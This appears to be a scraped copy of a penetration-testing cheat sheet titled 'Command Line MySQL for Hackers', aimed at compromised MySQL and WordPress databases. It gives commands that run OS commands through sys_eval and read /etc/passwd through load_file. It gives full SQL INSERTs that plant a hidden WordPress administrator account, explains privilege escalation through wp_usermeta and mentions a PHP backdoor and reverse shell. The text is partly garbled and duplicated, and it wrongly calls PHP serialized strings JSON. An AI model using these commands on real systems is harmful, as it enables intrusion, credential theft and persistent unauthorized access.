Professional Documents
Culture Documents
Command Line Mysql For Hackers PDF
Command Line Mysql For Hackers PDF
Learning to connect to a MySQL server via command line is extremely useful in many situations
especially for penetration testing. It’s quick, easy to learn and the fastest way to get in.
This command will log you into the MySQL server with user “user” on host address 192.168.0.26.
┌─[✗]─[user@parrot]─[~]
Enter password: <br> Welcome to the MariaDB monitor. Commands end with ; or \g.<br><br> Your
MySQL connection id is 4 <br> <br> Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu) <br><br> <br>
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. <br><br> <br> Type ‘help;’ or
‘\h’ for help. Type ‘\c’ to clear the current input statement. <br><br> <br> MySQL [(none)]>
To see what databases are available to the user you’ve logged in with type the “show” command. To
start viewing information about the database use the “use” command.”.
show databases;
use databasename;
show databases;
use databasename;
Tricks!
# execute commands against mysql
The two most important things you should know is how to see the tables of a database and view the
definition.
show tables;
show tables;
To see information about a table such as a schema use the “describe” command.
describe tablename;
describe tablename;
use wp_hacked;
use wp_hacked;
The user is “root” and the password is “plbkac”.. Yes, there isn’t a space between “-p” and the
password. That is the way you do it…
Ex-filtrating Data
select sys_eval("whoami");
select sys_eval("whoami");
Reading Data
select load_file("/etc/shells");
select load_file("/etc/passwd");
1
select load_file("/etc/shells");
select load_file("/etc/passwd");
This will create a PHP backdoor script that will execute commands against the system. You can easily
call home with a reverse shell.
You can create a new user with administrative access very easily using SQL. There are 2 tables and 3
sets of data the must be inserted to accomplish this. If you don’t want to create a new user and have
compromised a low privileged user you can use SQL to elevate your privileges by updating the
wp_usermeta table. Adjusting the meta_value for the meta_keys “wp_capabilities” and
“wp_user_level” will elevate access if done correctly.
This script isn’t 100% accurate. WordPress no longer users MD5 hashes for passwords. There’s a
script that adds a salt in WordPress. You’ll have to reset your password or copy in a known user’s
password.
The key thing about WordPress is understanding how data is saved. Some of the data in WordPress
is saved in composite JSON strings.
a:1:{s:6:"author";b:1;}
You can’t just change “author” to “administrator”. The “s” stands for string and the 6 means it is 6
characters long. You must update the entire JSON string to make this work.
a:1:{s:13:"administrator";s:1:"1";}
You will need to find the TOP value for the ID. This will not work if the ID already exists.
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,
`user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha',
MD5('demo'), 'Your Name', 'gotcha@hackaco.com', 'http://www.hackaco.com/', '2019-11-
2100:00:00', '', '0', 'L33t Haxor');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_user_level', '10');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_user_level', '10');
By concatenating the user login and password we can better extract data ready for John the Ripper.